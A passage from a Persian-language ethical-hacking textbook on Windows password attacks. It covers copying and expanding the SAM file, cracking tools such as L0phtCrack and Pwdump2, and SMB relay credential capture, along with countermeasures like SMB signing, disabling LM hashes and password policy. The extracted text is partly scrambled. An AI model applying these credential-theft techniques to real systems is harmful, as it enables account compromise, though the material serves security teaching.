ﻓﺎﻳﻞ SAM در وﻳﻨﺪوز، ﺷﺎﻣﻞ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎي hash ﺷﺪه اﺳﺖ ﻛﻪ در ﻣﺴﻴﺮ Windows\system32\config ﻗﺮار دارد . زﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻢ روﺷﻦ ﻣﻲ ﺷﻮد اﻳﻦ ﻓﺎﻳﻞ ﻗﻔﻞ ﻣﻲ ﺷﻮد ﺑﻨﺎﺑﺮاﻳﻦ ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ اﻳﻦ ﻓﺎﻳﻞ را ﻛﭙﻲ ﻛﻨﺪ . ﻳﻜﻲ از ﮔﺰﻳﻨﻪ ﻫﺎ ﺑﺮاي ﻛﭙﻲ ﻓﺎﻳﻞ SAM ، اﻳﻦ اﺳﺖ ﻛﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ را ﺑﺎ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ دﻳﮕﺮي راه اﻧﺪازي ﻛﻨﻴﺪ از ﻗﺒﻴﻞ DOS ﻳﺎ Linux ﺑﺎ CD راه اﻧﺪاز . در اﻳﻦ ﺣﺎﻟﺖ ﻣﻲ ﺗﻮان ﻓﺎﻳﻞ را از داﻳﺮﻛﺘﻮري repair ﻛﭙﻲ ﻛﺮد . اﮔﺮ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ از ﻗﺎﺑﻠﻴﺖ RDISK وﻳﻨﺪوز ﺑﺮاي ﮔﺮﻓﺘﻦ ﭘﺸﺘﻴﺒﺎن ﺳﻴﺴﺘﻢ ( ﺑﺎ اﺳﺘﻔﺎده از rdisk /s ) اﺳﺘﻔﺎده ﻛﻨﺪ، ﻳﻚ ﻛﭙﻲ ﻓﺸﺮده ﺷﺪه از ﻓﺎﻳﻞ SAM ﻛﻪ __.SAM ﻧﺎم دارد در ﻣﺴﻴﺮ c:\windows\repair اﻳﺠ ﺎد ﻣﻲ ﺷﻮد . ﺑﺮاي ﺑﺴﻂ اﻳﻦ ﻓﺎﻳﻞ، از دﺳﺘﻮر زﻳﺮ در cmd اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

C:\>expand sam.__ sam

ﭘﺲ از آﻧﻜﻪ ﻓﺎﻳﻞ از ﺣﺎﻟﺖ ﻓﺸﺮده ﺧﺎرج ﺷﺪ، ﻣﻲ ﺗﻮان ﺑﺎ اﺳﺘﻔﺎده از ﻧﺮم اﻓﺰار L0phtCrack ، از ﺣﻤﻼت dictionary ، brute-force ، ﻳﺎ hybrid اﺳﺘﻔﺎده ﻛﺮد . .

اﺑﺰارﻫﺎي ﻫﻚ Win32CreatedLocalAdminUser ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺣﺴﺎب ﻛﺎرﺑﺮي ﺟﺪﻳﺪي را ﺑﺎ ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد x ﻣﻲ ﺳﺎزد و آن را ﺑﻪ ﮔﺮوه administrator اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻋﻤﻞ، ﺑﺨﺸﻲ از ﭘﺮوژه Metasploit اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ Metasploit framework روي وﻳﻨﺪوزﻫﺎ اﺟﺮا ﺷﻮد . .

Offline NT Password Resetter روﺷﻲ ﺑﺮاي رﻳﺴﺖ ﻛﺮدن ﭘﺴﻮرد administrator اﺳﺖ . ﻣﻌﻤﻮل ﺗﺮﻳﻦ روش اﻳﻦ اﺳﺖ ﻛﻪ ﺑﺎ CD راه اﻧﺪاز Linux دﺳﺘﮕﺎه را راه اﻧﺪازي ﻛﻨﻴﺪ و ﺑﻪ ﭘﺎرﺗﻴﺸﻦ NTFS ﻛﻪ اﻛﻨﻮن ﺑﺼﻮرت ﻣﺤﺎﻓﻈﺖ ﺷﺪه ﻧﻴﺴﺖ، دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﻴﺪ و ﭘﺴﻮرد را ﺗﻐﻴﻴﺮ دﻫﻴﺪ . .

ﺑﺮﻧﺎﻣﻪ LCP ، ﺑﺮاي ﺑﺮرﺳﻲ ﭘﺴﻮرد ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮ در وﻳﻨﺪوزﻫﺎي XP ، 2000 ، NT و 2003 اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﻫﺮ ﺳﻪ ﻧﻮع ﺣﻤﻠﻪ Hybrid ، Dictionary و Brute force اﺳﺖ . .

ﺑﺮﻧﺎﻣﻪ ﻫﺎي دﻳﮕﺮي ﻧﻴﺰ ﻫﻤﭽﻮن Asterisk Logger ، Access Pass View ، Crack ، Ophcrack2 ، SID&User ، Asterisk Key ﻧﻴﺰ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﺑﻜﺎر ﻣﻲ روﻧﺪ . .

65

ﻫ ﻳاﺪ ﺖ SMB Logon ﺑﻪ ﺣﻤﻠﻪ ﻛﻨﻨﺪه

روش دﻳﮕﺮ ﺑﺮاي ﻛﺸﻒ ﭘﺴﻮردﻫﺎي روي ﺷﺒﻜﻪ، ﺗﻐﻴﻴﺮ ﻣﺴﻴﺮ SMB logon ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺣﻤﻠﻪ ﻛﻨﻨﺪه اﺳﺖ ﺗﺎ ﭘﺴﻮردﻫﺎ ﺑﻪ ﻫﻜﺮ ارﺳﺎل ﻣﻲ ﺷﻮد . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر، ﻫﻜﺮ ﺑﺎﻳﺴﺘﻲ ﭘﺎﺳﺦ ﻫﺎي NTLM را از ﺳﺮور اﺣﺮاز ﻫﻮﻳﺖ، sniff ﻛﻨﺪ و ﻗﺮﺑﺎﻧﻲ را اﻏﻔﺎل ﻛﻨﺪ ﺗﺎ ﺑﺎ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﻜﺮ اﺣﺮاز ﻫﻮﻳﺖ ﻛﻨﺪ . راﻳﺞ ﺗﺮﻳﻦ ﺗﻜﻨﻴﻚ، ارﺳﺎل اﻳﻤﻴﻠﻲ ﺑﻪ ﻗﺮﺑﺎﻧﻲ اﺳﺖ ﻛﻪ داراي ﻟﻴﻨﻜﻲ ﺑﻪ SMB Server ﺑﺎﺷﺪ اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﻗﺮﺑﺎﻧﻲ ﺑﺮ روي ﻟﻴﻨﻚ ﻛﻠﻴﻚ ﻛﺮد، ﺑﺪون آﻧﻜﻪ ﻣﺘﻮﺟﻪ ﺷﻮد اﻃﻼﻋﺎت اﺣﺮاز ﻫﻮﻳﺖ ﺧﻮد را روي ﺷﺒﻜﻪ ارﺳﺎل ﻣﻲ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي زﻳﺎدي ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻐﻴﻴﺮ ﺟﻬﺖ SMB را ﭘﻴﺎده ﺳﺎزي ﻛﻨﻨﺪ : :

اﺑﺰارﻫﺎي ﻫﻚ SMBRelay ، ﻳﻚ SMB Server اﺳﺖ ﻛﻪ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و hash ﻫﺎي ﭘﺴﻮردﻫﺎ را از ﺗﺮاﻓﻴﻚ SMB ورودي ﺑﺪﺳﺖ ﻣﻲ آورد . SMBRelay ، ﻣﻲ ﺗﻮاﻧﺪ ﺣﻤﻼت man-in-the-middle را اﻧﺠﺎم دﻫﺪ . .

SMBRelay2 ، ﻣﺸﺎﺑﻪ SMBRelay اﺳﺖ اﻣﺎ ﺑﺎ اﻳﻦ ﺗﻔﺎوت ﻛﻪ ﺑﻪ ﺟﺎي آدرس ﻫﺎي IP ، از اﺳﺎﻣﻲ NetBIOS ﺑﺮاي ﺑﺪﺳﺖ آوردن ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

Pwdump2 ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ hash ﻫﺎي ﭘﺴﻮردﻫﺎ را از ﻓﺎﻳﻞ SAM روي ﺳﻴﺴﺘﻢ وﻳﻨﺪوز اﺳﺘﺨﺮاج ﻣﻲ ﻛﻨﻨﺪ . ﭘﺴﻮردﻫﺎي اﺳﺘﺨﺮاج ﺷﺪه، از ﻃﺮﻳﻖ L0phtCrack ﻣﻲ ﺗﻮاﻧﻨﺪ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ . .

Samdump ، ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي اﺳﺘﺨﺮاج ﭘﺴﻮردﻫﺎي NTLM ﻛﻪ در ﻓﺎﻳﻞ hash ، SAM ﺷﺪه اﻧﺪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

C2MYAZZ ، ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺟﺎﺳﻮﺳﻲ اﺳﺖ ﻛﻪ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻼﻳﻨﺖ ﻫﺎي وﻳﻨﺪوزي، ﭘﺴﻮردﻫﺎ را ﺑﻪ ﺻﻮرت رﻣﺰ ﻧﺸﺪه ارﺳﺎل ﻛﻨﺪ . ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎﻳﻲ ﻛﻪ ﻛﺎرﺑﺮان ﺑ ﺮاي اﺗﺼﺎل ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ . .

66

ﺣﻤﻼت SMB Relay MITM و ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن

ﺣﻤﻠﻪ SMB Relay MITM ، زﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ ﻛﻨﻨﺪه ﻳﻚ ﺳﺮور ﺟﻌﻠﻲ راه اﻧﺪازي ﻣﻲ ﻛﻨﺪ، رخ ﻣﻲ دﻫﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﻼﻳﻨﺖ ﻗﺮﺑﺎﻧﻲ، ﺑﻪ ﺳﺮور ﺟﻌﻠﻲ ﻣﺘﺼﻞ ﻣﻲ ﺷﻮد، ﺷﻜﻞ زﻳﺮ، ﻣﺜﺎﻟﻲ از اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ SMB relay ، ﺷﺎﻣﻞ ﭘﻴﻜﺮﺑﻨﺪي وﻳﻨﺪوز 2000 ﺑﺮاي اﺳﺘﻔﺎده از SMB signing اﺳﺖ ﻛﻪ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻫﺮ ﺑﻼك از ارﺗﺒﺎﻃﺎت SMB ، رﻣﺰ راﺬﮔ ي ﺷﻮد . اﻳﻦ ﺗﻨﻈﻴﻤﺎت در Security Policies/Security Options وﺟﻮد دار .ﺪﻧ .ﺪﻧ

اﺑﺰارﻫﺎي ﻫﻚ SMBGrind ، ﺳﺮﻋﺖ ﻧﺸﺴﺖ ﻫﺎي L0phtCrack را ﺮﺑ روي اﺳﺘﺮاق ﺳﻤﻊ dump ﻫﺎ اﻓﺰاﻳﺶ ﻣﻲ دﻫﺪ . .

اﺑﺰار SMBDie ، ﺑﺎ ارﺳﺎل درﺧﻮاﺳﺖ ﻫﺎي SMB ﺟﻌﻠﻲ، ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎﻳﻲ ﻛﻪ داراي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز XP ، 2000 ، NT ﻫﺴﺘﻨﺪ را crash ﻣﻲ ﻛﻨﺪ . .

NBTdeputy ، ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﻧﺎم ﻛﺎﻣﭙﻴﻮﺗﺮي NetBIOS را روي ﺷﺒﻜﻪ رﺟﻴﺴﺘﺮ ﻛﻨﺪ و ﺑﻪ درﺧﻮاﺳﺖ ﻫﺎي NetBIOS ﭘﺎﺳﺦ دﻫﺪ . ﻫﻤﭽﻨﻴﻦ اﻳﻦ اﺑﺰار، اﺳﺘﻔﺎده از SMBRelay را ﺳﺎده ﻣﻲ ﻛﻨﺪ . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﻜﺴﺘﻦ ﭘﺴﻮرد

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﻜﺴﺘﻦ ﭘﺴﻮرد، ﺑﺎﻳﺪ از ﭘﺴﻮرد ﻗﻮي اﺳﺘﻔﺎده ﺷﻮد . ﻃﻮل ﭘﺴﻮردﻫﺎ، 8 ﺗﺎ 12 ﻛﺎراﻛﺘﺮ ﺑﺎﺷﺪ . ﺑﺮاي ﻣﺤﺎﻓﻈﺖ از ﺷﻜﺴﺘﻦ اﻟﮕﻮرﻳﺘﻢ hash ﺑﺮاي ﭘﺴﻮردﻫﺎﻳﻲ ﻛﻪ در ﺳﺮور ذﺧﻴﺮه ﺷﺪه اﻧﺪ، ﺑﺎﻳﺪ ﻣﺮاﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮور را

67

ﺑﺼﻮرت ﻓﻴﺰﻳﻜﻲ ﻣﺮاﻗﺒﺖ ﻛﻨﻴﺪ . ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻫﺎ ﻣﻲ ﺗﻮاﻧﺪ از اﺑﺰار ﺧﻮد وﻳﻨﺪوز ﻛﻪ SYSKEY ﻧﺎم دارد اﺳﺘﻔﺎده ﻛﻨﺪ ﺗﺎ ﻣﺮاﻗﺒﺖ ﺑﻴﺸﺘﺮي ﺑﺮ روي ﺳﺮور ﻳﺎ دﻳﺴﻚ داﺷﺘﻪ ﺑﺎﺷﺪ . log ﻫﺎي ﺳﺮور را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺣﻤﻼت brute-force روي ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨ .ﺪﻴ .ﺪﻴ

وﻳﻨﺪو ز ﺑﺮاي ذﺧﻴﺮه ﭘﺴﻮردﻫﺎي ﻛﺎرﺑﺮان، از دو روش ﻣﺨﺘﻠﻒ hash اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﮔﺮ ﻃﻮل ﭘﺴﻮرد ﻛﻤﺘﺮ از 15 15 ﻛﺎراﻛﺘﺮ ﺑﺎﺷﺪ، وﻳﻨﺪوز از دو روش LM hash و NT hash اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻛﻪ LM hash ﻧﺴﺒﺖ ﺑﻪ NT hash ، ﺿﻌﻴﻒ ﺗﺮ اﺳﺖ و در ﻣﻘﺎﺑﻞ ﺣﻤﻠﻪ brute force راﺣﺖ ﺗﺮ ﻣﻲ ﺷﻜﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، در ﭘﺎﻳﮕﺎه داده LM hash ، SAM ﻫﺎ را ذﺧﻴﺮه ﻧﻜﻨﻴﺪ . ﺑﺮاي اﻳﻨﻜﻪ ﭘﺮوﺗﻜﻞ ﻫﺎي NTLM v2 ، NTLM و Kerberos از NT hash اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ وﻟﻲ ﭘﺮوﺗﻜﻞ LM ، از LM hash اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺿﻌﻴﻒ ﺗﺮ از NT hash اﺳﺖ . ﺑﻨﺎﺑﺮاﻳﻦ اﮔﺮ در ﺷﺒﻜﻪ ﺗﺎن، وﻳﻨﺪوز 95 ، 98 ﻳﺎ ﻣﻜﻴﻨﺘﺎش ﻧﺪارﻳﺪ ﺑﻬﺘﺮ اﺳﺖ ﺑﻪ ﻳﻜﻲ از روش ﻫﺎي زﻳﺮ آن را ﻏﻴﺮ ﻓﻌﺎل ﻛﻨﻴﺪ : :

روش 1 : از Group Policy ، وارد ﻗﺴﻤﺖ Security Options و Local Security Policy ﺷﻮﻳﺪ و ﮔﺰﻳﻨﻪ زﻳﺮ را ﻏﻴﺮ ﻓﻌﺎل ﻛﻨﻴﺪ : Network security: Do not store LAN Manager hash value on next password change

روش 2 : از ﻃﺮﻳﻖ رﺟﻴﺴﺘﺮي وارد ﻣﺴﻴﺮ زﻳﺮ ﺷﻮﻳﺪ : :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa و ﺳﭙﺲ ﻛﻠﻴﺪي ﺑﻪ ﻧﺎم NoLMHash اﻳﺠﺎد ﻛﻨﻴﺪ . .

روش 3 زا: ﭘﺴﻮردي ﻛﻪ ﻃﻮل آن ﺑﻴﺸﺘﺮ از 15 ﻛﺎراﻛﺘﺮ اﺳﺖ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

ﻫﻤﭽﻨﻴﻦ ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﻜﺴﺘﻦ ﭘﺴﻮرد، ﻣﻮارد زﻳﺮ را در ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ : :

.1 ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض را ﺗﻐﻴﻴﺮ دﻫﻴﺪ. .2 ﭘﺴﻮردﻫﺎﻳﻲ ﻛﻪ در دﻳﻜﺸﻨﺮي وﺟﻮد دارﻧﺪ را اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ. .3 از ﭘﺴﻮردي اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ ﻛﻪ ﻣﺮﺑﻮط ﺑﻪ اﺳﻢ دﺳﺘﮕﺎه، اﺳﻢ داﻣﻴﻦ، ﻳﺎ ﻫﺮ ﭼﻴﺰ دﻳﮕﺮي ﻛﻪ ﻣﻲ ﺗﻮان در whois ﭘﻴﺪا ﻛﺮد ﺑﺎﺷﺪ. .4 ﭘﺴﻮردي ﻛﻪ ﻣﺮﺑﻮط ﺑﻪ ﻋﻼﻳﻖ ﺷﻤﺎ ﻳﺎ ﺗﺎرﻳﺦ ﺗﻮﻟﺪ ﺷﻤﺎ اﺳﺖ اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ. .5 اﮔﺮ از ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮي ﻣﻲ ﺧﻮاﻫﻴﺪ اﺳﺘﻔﺎده ﻛﻨﻴﺪ، از ﻛﻠﻤﻪ اي ﻛﻪ ﺑﻴﺸﺘﺮ از 21 ﻛﺎراﻛﺘﺮ د ارد اﺳﺘﻔﺎده ﻛﻨﻴﺪ.

68

در ﺑﺨﺶ ﻫﺎي ﺑﻌﺪي، ﺑﻪ دو ﻣﻌﻴﺎري ﻛﻪ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﺮاي ﺳﺎﺧﺖ ﭘﺴﻮرد ﻗﻮي ﺑﻜﺎر ﺑﺮﻳﺪ ﻧﮕﺎﻫﻲ ﺧﻮاﻫﻴﻢ داﺷﺖ . .

ﺑﺎزه زﻣﺎﻧﻲ ﺗﻐﻴﻴﺮ ﭘﺴﻮرد

ﭘﺴﻮردﻫﺎ ﺑﺎﻳﺴﺘﻲ ﺑﻌﺪ از ﻣﺪت زﻣﺎن ﻣﺸﺨﺼﻲ، ﻣﻨﻘﻀﻲ ( expire ) ﺷﻮﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻛﺎرﺑﺮان ﺑﺎﻳﺪ ﭘﺴﻮرد ﻳﺎﻫ ﺸﺎن را ﺗﻐﻴﻴﺮ دﻫﻨﺪ . اﮔﺮ ﻃﻮل ﭘﺴﻮرد ﺑﺴﻴﺎر ﻛﻮﺗﺎه ﺑﺎﺷﺪ، ﻛﺎرﺑﺮان ﭘﺴﻮردﻫﺎﻳﺸﺎن را ﻓﺮاﻣﻮش ﻣﻲ ﻛﻨﻨﺪ در ﻧﺘﻴﺠﻪ، ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﺎﻳﺪ ﭘﺴﻮردﻫﺎي ﻛﺎرﺑﺮان را ﺑﺎرﻫﺎ ﺴﻳر ﺖ ﻛﻨﻨﺪ . از ﻃﺮﻓﻲ دﻳﮕﺮ، اﮔﺮ اﻳﻦ ﻣﺪت زﻣﺎن ﺑﺴﻴﺎر ﻃﻮﻻﻧﻲ ﺑﺎﺷﺪ، اﻣﻨﻴﺖ ﺑﻪ ﺧﻄﺮ ﻣﻲ اﻓﺘﺪ . ﻣﺪت زﻣﺎن ﺗﻮﺻﻴﻪ ﺷﺪه ﺑﺮاي اﻳﻦ ﺑﺎزه، 30 روز اﺳﺖ . ﻋﻼوه ﺑﺮ اﻳﻦ، ﺗ ﻮﺻﻴﻪ ﻣﻲ ﺷﻮد ﻛﻪ ﻛﺎرﺑﺮان ﻧﺘﻮاﻧﻨﺪ از ﺳﻪ ﭘﺴﻮرد ﻗﺒﻠﻲ ﺷﺎن دوﺑﺎره اﺳﺘﻔﺎده ﻛﻨﻨﺪ . .

ﺑﺮرﺳﻲ Event Viewer Log ﻫﺎ ﻫﺎ

ﻣﺪﻳﺮان ﺑﺎﻳﺪ Event Viewer log ﻫﺎ را ﺑﺮرﺳﻲ ﻛﻨﻨﺪ ﺗﺎ ﻫﺮ رﺧﺪادي را ﻗﺒﻞ از اﺗﻔﺎق ﻳﺎ در ﻃﻮل اﺗﻔﺎق ﺗﺸﺨﻴﺺ دﻫﻨﺪ . ﺑﻄﻮر ﻛﻠﻲ، ﭼﻨﺪﻳﻦ ﺗﻼش ﻧﺎﻣﻮﻓﻖ ﻣﻲ ﺗﻮاﻧﺪ در ﺳﻴﺴﺘﻢ ﺛﺒﺖ ﺷﻮد و ﺗﻨﻬﺎ ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﺘﻮاﻧﻨﺪ آن را ﺑﺮرﺳﻲ ﻛﻨﻨﺪ . .

اﺑﺰارﻫﺎﻳﻲ از ﻗﺒﻴﻞ VisualLast ، ﻣﺪﻳﺮ ﺷﺒﻜﻪ را ﺑﺮاي رﻣﺰﮔﺸﺎﻳﻲ و ﺗﺤﻠﻴﻞ ﻓﺎﻳﻞ ﻫﺎي log اﻣﻨﻴﺘﻲ، ﻛﻤﻚ ﻣﻲ ﻨﻛ .ﻨﺪ .ﻨﺪ اﻳﻦ اﺑﺰار، دﻳﺪ ﺑﺰرﮔﺘﺮي را ﺑﻪ NT event log ﻫﺎ ﺑﺎز ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﻣﺪﻳﺮ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺻﻮرت دﻗﻴﻖ ﺗﺮ و ﻣﻮﺛﺮﺗﺮ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﺷﺒﻜﻪ دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﺪ ﻳا. ﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺮاي اﻳﻦ ﻃﺮاﺣﻲ ﺷﺪه اﺳﺖ ﻛﻪ ﻣﺪﻳﺮان ﺷﺒﻜﻪ ﺪﻨﻧاﻮﺘﺑ ﮔﺰارﺷﺎت زﻣﺎن ﻫﺎي ورود و ﺧﺮوج ﻛﺎرﺑﺮان را ﺑﺒﻴﻨﻨﺪ اﻳﻦ وﻗﺎﻳﻊ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﻃﺒﻖ ﻓﺮﻳﻢ زﻣﺎن ، ﺟﺴﺘﺠﻮ ﺷﻮﻧﺪ ﻛﻪ ﺑﺮاي ﺗﺤﻠﻴﻞ اﻣﻨﻴﺘﻲ ﺑﺴﻴﺎر ﻣﻬﻢ ﻫﺴ .ﺪﻨﺘ .ﺪﻨﺘ

69

Event log ﻫﺎ در ﻣﺴﻴﺮ c:\\windows\system32\config\Sec.Event.Evt ﻗﺮار دارﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ردﭘﺎﻫﺎي ﺗﻼش ﻫﺎي brute-force ﺣﻤﻠﻪ ﻛﻨﻨﺪه اﺳﺖ . .

اﺑﺰار AccountAudit ، ﺑﻪ ﻣﺪﻳﺮان ﺷﺒﻜﻪ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ ﭘﺎﻳﮕﺎه داده ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮان در اﻛﺘﻴﻮ داﻳﺮﻛﺘﻮري را ﺑﺮرﺳﻲ ﻛﻨﻨﺪ ﺗﺎ رﻳﺴﻚ ﻫﺎي اﻣﻨﻴﺘﻲ راﻳﺞ ﻫﻤ ﭽﻮن ﻛﺎرﺑﺮان ﺑﺪون ﭘﺴﻮرد، ﻳﺎ ... .ﺪﻨﻨﻴﺒﺑرا .ﺪﻨﻨﻴﺒﺑرا

اﻧﻮاع ﭘﺴﻮرد

ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎ، ﭼﻨﺪﻳﻦ ﻧﻮع ﭘﺴﻮرد وﺟﻮد دارد . ﻛﺎراﻛﺘﺮﻫﺎﻳﻲ ﻛﻪ ﭘﺴﻮرد را ﺗﺸﻜﻴﻞ ﻣﻲ دﻫﻨﺪ، ﭼﻨﺪﻳﻦ دﺳﺘﻪ ﺑﻨﺪي دارﻧﺪ : :

• ﺗﻨﻬﺎ ﺣﺮوف • ﺗﻨﻬﺎ اﻋﺪاد • ﺗﻨﻬﺎ ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص • ﺣﺮوف و اﻋﺪاد • ﺗﻨﻬﺎ ﺣﺮوف و ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص • ﺗﻨﻬﺎ اﻋﺪاد و ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص • ﺣﺮوف، اﻋﺪاد، و ﻛﺎرﻛﺘﺮﻫﺎي ﺧﺎص

ﻳﻚ ﭘﺴﻮرد ﻗﻮي، اﺣﺘﻤﺎل ﻛﻤﺘﺮي ﺑﺮاي ﺷﻜﺴﺘﻪ ﺷﺪن ﺗﻮﺳﻂ ﻫﻜﺮ دارد . ﻗﻮاﻧﻴﻦ زﻳﺮ ﻛﻪ ﺗﻮﺳﻂ EC Council اراﺋﻪ ﺷﺪه اﺳﺖ، ﺑﺎﻳﺴﺘﻲ ﺑﺮاي اﻳﺠﺎد ﭘﺴﻮرد در ﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﺗﺎ در ﻣﻘﺎﺑﻞ ﺣﻤﻼت ﻣﺤﺎﻓﻆ ﺑﺎﺷﺪ : :

• ﻧﺒﺎﻳﺪ ﺷﺎﻣﻞ ﺑﺨﺸﻲ از ﻧﺎ م ﻛﺎرﺑﺮي ﺑﺎﺷﺪ • ﺣﺪاﻗﻞ ﻃﻮل آن ﺑﺎﻳﺪ 8 ﻛﺎراﻛﺘﺮ ﺑﺎﺷﺪ • ﺑﺎﻳﺪ ﺣﺪاﻗﻞ ﺷﺎﻣﻞ ﺳﻪ ﻗﺴﻤﺖ از دﺳﺘﻪ ﻫﺎي زﻳﺮ ﺑﺎﺷﺪ: o ﻋﻼﺋﻢ ﻏﻴﺮ اﻟﻔﺒﺎﻳﻲ ( #!@%":,$) o اﻋﺪاد o ﺣﺮوف ﺑﺰرگ o ﺣﺮوف ﻛﻮﭼﻚ

70

ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮ از اﻧﻮاع ﻣﺨﺘﻠﻒ ﺣﻤﻼت ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻳﻚ ﭘﺴﻮرد و ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﺪ . اﻧﻮاع ﺣﻤﻼت ﭘﺴﻮرد ﺑﻪ ﺷﺮح زﻳﺮ اﺳﺖ : :

Passive online : ﻣﺒﺎدﻻت ﭘﺴﻮرد ﺑﺮ روي ﺷﺒﻜﻪ را اﺳﺘﺮاق ﺳﻤﻊ ﻣﻲ ﻛﻨﺪ . ﺣﻤﻼت passive online ، ﺷﺎﻣﻞ ﺣﻤﻼت man-in-the-middle ، sniffing ، و reply اﺳﺖ . .

Active online : ﭘﺴﻮرد Administrator را ﺣﺪس ﻣﻲ زﻧﺪ . ﺣﻤﻼت active online ، ﺣﺪس ﺧﻮدﻛﺎر ﭘﺴﻮرد اﺳﺖ . .

Offline : ﺣﻤﻼت hybrid ، Dictionary ، و brute-force اﺳﺖ . .

Shoulder surfing : Nonelectronic ، اﺳﺘﺮاق ﺳﻤﻊ ﺻﻔﺤﻪ ﻛﻠﻴﺪ، و ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ . .

ﺣﻤﻼت Passive Online

